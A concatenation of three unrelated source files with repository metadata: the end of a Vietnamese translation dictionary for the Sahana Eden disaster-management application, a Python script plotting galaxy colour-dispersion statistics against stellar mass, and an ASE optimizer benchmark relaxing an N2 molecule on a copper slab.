People can also be captured by group for efficiency and convenience.': 'là trung tâm thông tin trực tuyến, nơi lưu trữ thông tin về các nạn nhân và gia đình chịu ảnh hưởng của thiên tai, đặc biệt là xác định con số thương vong và lượng người sơ tán.Thông tin như tên, tuổi, số điện thoại, số CMND, nơi sơ tán và các thông tin khác cũng được lưu lại.Ảnh và dấu vân tay cũng có thể tải lên hệ thống.Để hiệu quả và tiện lợi hơn có thể quản lý theo nhóm', 'items selected': 'mặt hàng được lựa chọn', 'key': 'phím', 'label': 'Nhãn', 'latrines': 'nhà vệ sinh', 'learning, safe schools': 'trường học an toàn, giáo dục', 'light': 'Ánh sáng', 'local knowledge, local risk mapping': 'hiểu biết của địa phương, lập bản đồ rủi ro của địa phương', 'locust, plague, African bees': 'châu chấu, ong Châu Phi', 'long': 'dài', 'long>12cm': 'dài>12cm', 'male': 'Nam', 'mandatory fields': 'Trường bắt buộc', 'married': 'đã kết hôn', 'max': 'tới', 'maxExtent': 'Mở rộng tối đa', 'maxResolution': 'Độ phân giải tối đa', 'medium': 'trung bình', 'medium<12cm': 'trung bình <12cm', 'min': 'từ', 'minutes': 'biên bản', 'missing': 'mất tích', 'moderate': 'trung bình', 'module allows the site administrator to configure various options.': 'mô đun cho phép người quản trị trang thông tin cài đặt cấu hình các tùy chọn khác nhau', 'module helps monitoring the status of hospitals.': 'module giúp theo dõi tình trạng bệnh viện', 'multiple hazard crisis, humanitarian crisis, conflict': 'đa hiểm họa, xung đột, khủng hoảng nhân đạo', 'multiplier[0]': 'số nhân[0]', 'natural hazard': 'thảm họa thiên nhiên', 'negroid': 'người da đen', 'never update': 'không bao giờ cập nhật', 'never': 'không bao giờ', 'new ACL': 'ACL mới', 'new': 'thêm mới', 'next 50 rows': '50 dòng tiếp theo', 'no options available': 'không có lựa chọn sẵn có', 'no': 'không', 'none': 'không có', 'normal': 'bình thường', 'not specified': 'không xác định', 'obsolete': 'Đã thôi hoạt động', 'of total data reported': 'của dữ liệu tổng được báo cáo', 'of': 'của', 'offices by organisation': 'văn phòng theo tổ chức', 'on %(date)s': 'vào %(date)s', 'or import from csv file': 'hoặc nhập dữ liệu từ tệp tin csv', 'or': 'hoặc', 'other': 'khác', 'out of': 'ngoài ra', 'over one hour': 'hơn một tiếng', 'overdue': 'quá hạn', 'paid': 'đã nộp', 'per month': 'theo tháng', 'piece': 'chiếc', 'poor': 'nghèo', 'popup_label': 'nhãn_cửa sổ tự động hiển thị', 'previous 50 rows': '50 dòng trước', 'problem connecting to twitter.com - please refresh': 'lỗi kết nối với twitter.com - vui lòng tải lại', 'provides a catalogue of digital media.': 'cung cấp danh mục các phương tiện truyền thông kỹ thuật số', 'pull and push': 'kéo và đẩy', 'pull': 'kéo', 'push': 'đẩy', 'record does not exist': 'Thư mục ghi không tồn tại', 'record id': 'lưu tên truy nhập', 'records deleted': 'hồ sơ đã được xóa', 'red': 'đỏ', 'replace': 'thay thế', 'reports successfully imported.': 'báo cáo đã được nhập khẩu thành công', 'representation of the Polygon/Line.': 'đại diện của Polygon/Line.', 'retry': 'Thử lại', 'risk assessment, loss data, disaster risk management': 'đánh giá rủi ro, dữ liệu thiệt hại, quản lý rủi ro thảm họa', 'risk knowledge, monitoring and warning service, risk communication, response capability, disaster preparedness, risk modelling': 'tăng cường hiểu biết về rủi ro, hoạt động cảnh báo và giám sát, truyền thông về rủi ro, khả năng ứng phó, phòng ngừa thảm họa, lập mô hình ứng phó với rủi ro', 'river': 'sông', 'row.name': 'dòng.tên', 'search': 'tìm kiếm', 'seconds': 'giây', 'see comment': 'xem ghi chú', 'seismic, 
tectonic': 'địa chấn', 'selected': 'Được chọn', 'separated from family': 'Chia tách khỏi gia đình', 'separated': 'ly thân', 'shaved': 'bị cạo sạch', 'short': 'Ngắn', 'short<6cm': 'Ngắn hơn <6cm', 'sides': 'các mặt', 'sign-up now': 'Đăng ký bây giờ', 'simple': 'đơn giản', 'single': 'độc thân', 'slim': 'mỏng', 'straight': 'thẳng hướng', 'strong': 'Mạnh', 'sublayer.name': 'tên.lớp dưới', 'submitted by': 'được gửi bởi', 'suffered financial losses': 'Các mất mát tài chính đã phải chịu', 'sustainable development, environmental degradation, ecosystems and environmental management': 'phát triển bền vững, thoái hóa môi trường, quản lý môi trường và hệ sinh thái', 'table': 'bảng', 'tall': 'cao', 'text': 'từ khóa', 'times (0 = unlimited)': 'thời gian (0 = vô hạn)', 'times and it is still not working. We give in. Sorry.': 'Nhiều lần mà vẫn không có kết quả, thất bại, xin lỗi', 'times': 'thời gian', 'to access the system': 'truy cập vào hệ thống', 'to download a OCR Form.': 'Để tải xuống một mẫu OCR', 'tonsure': 'lễ cạo đầu', 'total': 'tổng', 'training and development, institutional strengthening, institutional learning': 'tập huấn và phát triển, tăng cường thể chế, tăng cường hiểu biết của tổ chức', 'tweepy module not available within the running Python - this needs installing for non-Tropo Twitter support!': 'mô đun tweepy không có trong quá trình chạy Python - cần cài đặt để hỗ trợ Twitter không có Tropo!', 'unapproved': 'chưa được chấp thuận', 'uncheck all': 'bỏ chọn toàn bộ', 'unknown': 'không biết', 'unlimited': 'vô hạn', 'up to 3 locations': 'lên tới 3 địa điểm', 'update if master': 'cập nhật nếu là bản gốc', 'update if newer': 'cập nhật nếu mới hơn', 'update': 'cập nhật', 'updated': 'đã cập nhật', 'urban fire, bush fire, forest fire, uncontrolled fire, wildland fire': 'cháy trong đô thị, cháy rừng, cháy không kiểm soát, cháy vùng đất hoang dã', 'urban planning, urban management': 'quy hoạch đô thị, quản lý đô thị', 'using default': 'sử dụng mặc định', 'waterspout, twister, vortex': 'vòi rồng, gió xoáy, giông lốc', 'wavy': 'dạng sóng', 'weekly': 'hàng tuần', 'weeks': 'tuần', 'white': 'trắng', 'wider area, longer term, usually contain multiple Activities': 'khu vực rộng lớn hơn, dài hạn hơn, thường chứa nhiều Hoạt động', 'widowed': 'góa', 'within human habitat': 'trong khu dân cư', 'yes': 'có', }
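# ---------------------------------------------------------------------------
# Usage note (hedged, not part of the original file): this file is a plain
# Python dict literal mapping English source strings to their Vietnamese
# translations. In a web2py application such as Sahana Eden it is read back
# with gluon.languages.read_dict; the exact call below is an assumption about
# the web2py versions Eden targets, shown for illustration only.
#
#     from gluon.languages import read_dict
#     vi = read_dict('languages/vi.py')
#     print vi['Volunteer']   # 'Tình nguyện viên'
# ---------------------------------------------------------------------------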
gallifrey17/eden
languages/vi.py
Python
mit
373,313
[ "VisIt" ]
1cdc7c0136ecca5506795f641172dee39567a824eb92f0b87c8357c3bb46d6de
#!/usr/bin/env python
import pylab as pyl
import cPickle as pickle
from astLib import astCalc


def plot_icd_vs_mass():
    galaxies = pickle.load(open('galaxies.pickle', 'rb'))
    # Keep galaxies whose half-light radius exceeds 2 proper kpc
    # (0.06"/pixel scale; astCalc.da(z) is in Mpc, 206265 arcsec per radian).
    galaxies = filter(lambda galaxy: 0.06 * galaxy.halflight *
                      astCalc.da(galaxy.z) * 1000 / 206265. > 2, galaxies)

    # Make figure
    f1 = pyl.figure(1, figsize=(6, 4))
    f1s1 = f1.add_subplot(121)
    f1s2 = f1.add_subplot(122)
    # f1s3 = f1.add_subplot(223)
    # f1s4 = f1.add_subplot(224)

    # Upper and lower limit arrow verts
    arrowup_verts = [[0., 0.], [-1., -1], [0., 0.], [0., -2.], [0., 0.],
                     [1, -1], [0, 0]]
    # arrowdown_verts = [[0., 0.], [-1., 1], [0., 0.],
    #                    [0., 2.], [0., 0.], [1, 1]]

    # Scatter the individual i-H ICD values; galaxies above 50% are drawn as
    # upper-limit arrows at the top of the left panel.
    for galaxy in galaxies:
        if galaxy.ston_I > 30. and galaxy.ICD_IH is not None:
            # Add arrows first
            if galaxy.ICD_IH > 0.5:
                f1s1.scatter(galaxy.Mass, 0.5 * 100, s=100, marker=None,
                             verts=arrowup_verts)
            else:
                f1s1.scatter(galaxy.Mass, galaxy.ICD_IH * 100, c='0.8',
                             marker='o', s=25, edgecolor='0.8')
                f1s2.scatter(galaxy.Mass, galaxy.ICD_IH * 100, c='0.8',
                             marker='o', s=25, edgecolor='0.8')
    '''
    if galaxy.ston_J > 30. and galaxy.ICD_JH != None:
        # Add arrows first
        if galaxy.ICD_JH > 0.12:
            f1s3.scatter(galaxy.Mass, 12, s=100, marker=None,
                         verts=arrowup_verts)
        else:
            f1s3.scatter(galaxy.Mass, galaxy.ICD_JH * 100, c='0.8',
                         marker='o', s=25, edgecolor='0.8')
            f1s4.scatter(galaxy.Mass, galaxy.ICD_JH * 100, c='0.8',
                         marker='o', s=25, edgecolor='0.8')
    '''

    # Add the box and whiskers
    galaxies2 = filter(lambda galaxy: galaxy.ston_I > 30., galaxies)
    galaxies2 = pyl.asarray(galaxies2)
    # x must be an array so the x >= xmin / x < xmax comparisons below are
    # elementwise (with a plain list they collapse to a single bool and the
    # zip() call fails).
    x = pyl.asarray([galaxy.Mass for galaxy in galaxies2])
    ll = 8.5
    ul = 12
    # bins_x = pyl.arange(8.5, 12.5, 0.5)
    bins_x = pyl.array([8.5, 9., 9.5, 10., 10.5, 11., 12.])
    grid = []

    # Collect the galaxies falling into each mass bin.
    for i in range(bins_x.size - 1):
        xmin = bins_x[i]
        xmax = bins_x[i + 1]
        cond = [cond1 and cond2 for cond1, cond2 in zip(x >= xmin, x < xmax)]
        grid.append(galaxies2.compress(cond))

    icd = []
    for i in range(len(grid)):
        icd.append([galaxy.ICD_IH * 100 for galaxy in grid[i]])

    from boxplot_percentile_width import percentile_box_plot as pbp
    # bp1 = f1s1.boxplot(icd, positions=pyl.delete(bins_x, -1) + 0.25, sym='')
    width = pyl.diff(bins_x)
    index = pyl.delete(bins_x, -1) + 0.25
    index[-1] = index[-1] + 0.25
    pbp(f1s1, icd, indexer=list(index), width=width)
    pbp(f1s2, icd, indexer=list(index), width=width)

    '''
    # Add the box and whiskers
    galaxies2 = filter(lambda galaxy: galaxy.ston_J > 30., galaxies)
    galaxies2 = pyl.asarray(galaxies2)
    x = [galaxy.Mass for galaxy in galaxies2]
    ll = 8.5
    ul = 12
    # bins_x = pyl.linspace(ll, ul, 7)
    # bins_x = pyl.arange(8.5, 12.5, 0.5)
    bins_x = pyl.array([8.5, 9., 9.5, 10., 10.5, 11., 12.])
    grid = []

    for i in range(bins_x.size - 1):
        xmin = bins_x[i]
        xmax = bins_x[i + 1]
        cond = [cond1 and cond2 for cond1, cond2 in zip(x >= xmin, x < xmax)]
        grid.append(galaxies2.compress(cond))

    icd = []
    for i in range(len(grid)):
        icd.append([galaxy.ICD_JH * 100 for galaxy in grid[i]])

    # bp2 = f1s2.boxplot(icd, positions=pyl.delete(bins_x, -1) + 0.25, sym='')
    width = pyl.diff(bins_x)
    index = pyl.delete(bins_x, -1) + 0.25
    index[-1] = index[-1] + 0.25
    pbp(f1s3, icd, indexer=list(index), width=width)
    pbp(f1s4, icd, indexer=list(index), width=width)
    '''

    # Finish plot
    # Tweak colors on the boxplot
    # pyl.setp(bp1['boxes'], lw=2)
    # pyl.setp(bp1['whiskers'], lw=2)
    # pyl.setp(bp1['medians'], lw=2)
    # pyl.setp(bp2['boxes'], lw=2)
    # pyl.setp(bp2['whiskers'], lw=2)
    # pyl.setp(bp2['medians'], lw=2)
    # pyl.setp(bp['fliers'], color='#8CFF6F', marker='+')

    # f1s1.axvspan(7.477, 9, facecolor='#FFFDD0', ec='None', zorder=0)
    # f1s1.axvspan(11, 12, facecolor='#FFFDD0', ec='None', zorder=0)
    # f1s2.axvspan(7.477, 9, facecolor='#FFFDD0', ec='None', zorder=0)
    # f1s2.axvspan(11, 12, facecolor='#FFFDD0', ec='None', zorder=0)

    f1s1.set_xlim(8, 12)
    f1s2.set_xlim(8, 12)
    # f1s3.set_xlim(8, 12)
    # f1s4.set_xlim(8, 12)
    f1s1.set_ylim(-10, 50)
    f1s2.set_ylim(0, 15)
    # f1s3.set_ylim(-5, 12)
    # f1s4.set_ylim(-1, 3)
    f1s1.set_xticks([8, 9, 10, 11, 12])
    # f1s1.set_xticklabels([])
    f1s2.set_xticks([8, 9, 10, 11, 12])
    # f1s2.set_xticklabels([])
    # f1s3.set_xticks([8, 9, 10, 11, 12])
    # f1s4.set_xticks([8, 9, 10, 11, 12])
    # f1s4.set_yticks([-1, 0, 1, 2, 3])

    f1s1.set_ylabel(r"$\xi[i_{775},H_{160}]$ (%)")
    f1s1.set_xlabel(r"Log Mass ($M_{\odot})$")
    f1s2.set_xlabel(r"Log Mass ($M_{\odot})$")
    # f1s3.set_ylabel(r"$\xi[J_{125},H_{160}]$ (%)")

    # Build a shared legend below both panels.
    import matplotlib.font_manager
    line1 = pyl.Line2D([], [], marker='o', mfc='0.8', mec='0.8',
                       markersize=8, linewidth=0)
    line2 = pyl.Line2D([], [], marker='s', mec='#348ABD', mfc='None',
                       markersize=10, linewidth=0, markeredgewidth=2)
    line3 = pyl.Line2D([], [], color='#A60628', linewidth=2)
    prop = matplotlib.font_manager.FontProperties(size='small')
    pyl.figlegend((line1, line2, line3), ('Data', 'Quartiles', 'Medians'),
                  'lower center', prop=prop, ncol=3)

    # Connect the panels to mark the zoomed region shown on the right.
    from matplotlib.patches import ConnectionPatch
    xy = (12, 15)
    xy2 = (8, 15)
    con = ConnectionPatch(xyA=xy, xyB=xy2, coordsA='data', coordsB='data',
                          axesA=f1s1, axesB=f1s2)
    xy = (12, 0)
    xy2 = (8, 0)
    con2 = ConnectionPatch(xyA=xy, xyB=xy2, coordsA='data', coordsB='data',
                           axesA=f1s1, axesB=f1s2)
    f1s1.add_artist(con)
    f1s1.add_artist(con2)

    xy = (12, 3)
    xy2 = (8, 3)
    # con = ConnectionPatch(xyA=xy, xyB=xy2, coordsA='data', coordsB='data',
    #                       axesA=f1s3, axesB=f1s4)
    xy = (12, -1)
    xy2 = (8, -1)
    # con2 = ConnectionPatch(xyA=xy, xyB=xy2, coordsA='data', coordsB='data',
    #                        axesA=f1s3, axesB=f1s4)
    # f1s3.add_artist(con)
    # f1s3.add_artist(con2)

    pyl.draw()
    pyl.show()


if __name__ == '__main__':
    plot_icd_vs_mass()
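# ---------------------------------------------------------------------------
# Hedged sketch (not part of the original script): the size cut at the top of
# plot_icd_vs_mass() converts a half-light radius from detector pixels to a
# proper size in kpc. The helper below makes that conversion explicit; the
# function name and the reading of 0.06 as an arcsec-per-pixel scale are
# assumptions for illustration.
def halflight_kpc(r_pix, z, pix_scale=0.06):
    # astCalc.da(z) is the angular diameter distance in Mpc; the factor 1000
    # converts to kpc and 206265 converts arcseconds to radians.
    return r_pix * pix_scale * astCalc.da(z) * 1000. / 206265.
# e.g. halflight_kpc(5, 2.0) is roughly 2.5 kpc under astLib's default
# cosmology, so the cut above keeps galaxies larger than about 2 kpc.
# ---------------------------------------------------------------------------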
boada/ICD
sandbox/plot_icd_mass_box_width.py
Python
mit
6,289
[ "Galaxy" ]
18bcc6401644d408d4c9fef2bbde7e3b9d7971f20facbf5905f5fa876a9814cc
from ase import Atoms, Atom from ase.calculators.emt import EMT from ase.constraints import FixAtoms from ase.optimize.test import run_test name = 'N2Cu' def get_atoms_surf(): a = 2.70 c = 1.59 * a h = 1.85 d = 1.10 slab = Atoms('2Cu', [(0., 0., 0.), (1/3., 1/3., -0.5*c)], tags=(0, 1), pbc=(1, 1, 0)) slab.set_cell([(a, 0, 0), (a / 2, 3**0.5 * a / 2, 0), (0, 0, 1)]) slab = slab.repeat((4, 4, 1)) mask = [a.tag == 1 for a in slab] slab.set_constraint(FixAtoms(mask=mask)) return slab def get_atoms_adsorbate(): # We need the relaxed slab here! slab = Atoms([ Atom('Cu', [ -1.028468159509163, -0.432387156877267, -0.202086055768265]), Atom('Cu', [ 0.333333333333333, 0.333333333333333, -2.146500000000000]), Atom('Cu', [ 1.671531840490805, -0.432387156877287, -0.202086055768242]), Atom('Cu', [ 3.033333333333334, 0.333333333333333, -2.146500000000000]), Atom('Cu', [ 4.371531840490810, -0.432387156877236, -0.202086055768261]), Atom('Cu', [ 5.733333333333333, 0.333333333333333, -2.146500000000000]), Atom('Cu', [ 7.071531840490944, -0.432387156877258, -0.202086055768294]), Atom('Cu', [ 8.433333333333335, 0.333333333333333, -2.146500000000000]), Atom('Cu', [ 0.321531840490810, 1.905881433340708, -0.202086055768213]), Atom('Cu', [ 1.683333333333333, 2.671601923551318, -2.146500000000000]), Atom('Cu', [ 3.021531840490771, 1.905881433340728, -0.202086055768250]), Atom('Cu', [ 4.383333333333334, 2.671601923551318, -2.146500000000000]), Atom('Cu', [ 5.721531840490857, 1.905881433340735, -0.202086055768267]), Atom('Cu', [ 7.083333333333333, 2.671601923551318, -2.146500000000000]), Atom('Cu', [ 8.421531840490820, 1.905881433340739, -0.202086055768265]), Atom('Cu', [ 9.783333333333335, 2.671601923551318, -2.146500000000000]), Atom('Cu', [ 1.671531840490742, 4.244150023558601, -0.202086055768165]), Atom('Cu', [ 3.033333333333334, 5.009870513769302, -2.146500000000000]), Atom('Cu', [ 4.371531840490840, 4.244150023558694, -0.202086055768265]), Atom('Cu', [ 5.733333333333333, 5.009870513769302, -2.146500000000000]), Atom('Cu', [ 7.071531840490880, 4.244150023558786, -0.202086055768352]), Atom('Cu', [ 8.433333333333335, 5.009870513769302, -2.146500000000000]), Atom('Cu', [ 9.771531840491031, 4.244150023558828, -0.202086055768371]), Atom('Cu', [ 11.133333333333335, 5.009870513769302, -2.146500000000000]), Atom('Cu', [ 3.021531840490714, 6.582418613776583, -0.202086055768197]), Atom('Cu', [ 4.383333333333334, 7.348139103987287, -2.146500000000000]), Atom('Cu', [ 5.721531840490814, 6.582418613776629, -0.202086055768203]), Atom('Cu', [ 7.083333333333333, 7.348139103987287, -2.146500000000000]), Atom('Cu', [ 8.421531840490985, 6.582418613776876, -0.202086055768357]), Atom('Cu', [ 9.783333333333335, 7.348139103987287, -2.146500000000000]), Atom('Cu', [ 11.121531840490929, 6.582418613776676, -0.202086055768221]), Atom('Cu', [ 12.483333333333334, 7.348139103987287, -2.146500000000000]), ]) mask = [a.position[2] < -1 for a in slab] slab.set_constraint(FixAtoms(mask=mask)) a = 2.70 c = 1.59 * a h = 1.85 d = 1.10 x = slab.positions[0, 2] / (c / 2) * 100 molecule = Atoms('2N', positions=[(0., 0., h), (0., 0., h + d)]) molecule.set_calculator(EMT()) slab.extend(molecule) return slab def get_calculator(): return EMT() run_test(get_atoms_surf, get_calculator, name + '-surf', steps=200) run_test(get_atoms_adsorbate, get_calculator, name + '-N2', steps=200)
grhawk/ASE
tools/ase/optimize/test/N2Cu_relax.py
Python
gpl-2.0
4,291
[ "ASE" ]
60650b9ecb43fee91f8000d43098a050b585f0e903161718761dfcba068cffa1